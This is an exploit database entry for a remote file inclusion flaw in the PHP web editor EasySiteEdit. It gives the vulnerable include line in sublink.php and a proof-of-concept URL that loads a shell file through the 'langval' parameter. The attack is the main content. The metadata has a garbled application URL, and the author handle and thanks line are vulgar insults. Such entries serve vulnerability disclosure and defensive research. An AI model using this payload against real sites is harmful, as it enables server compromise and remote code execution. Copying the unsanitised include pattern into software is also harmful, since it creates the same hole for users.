EasySiteEdit - Remote File Inclusion

Author: koskesh jakesh
type: webapps
platform: php
port: 
date_added: 2011-08-21 
date_updated: 2011-08-21 
verified: 0 
codes: OSVDB-74912 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comesev2.zip

# Exploit Title: EasySiteEdit remote file include
# Date:2011
# Author:koskesh jakesh
# Software Link: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip
# Tested on: linux
-------------------------------
vul:sublink.php
line 20:
include($_REQUEST['langval']);
-------------------------------
poc:
site.com/path/sublink.php?langval=shell.txt?
--------------------------------
thanks:kire rostam,kose zan dait,kose shohar amat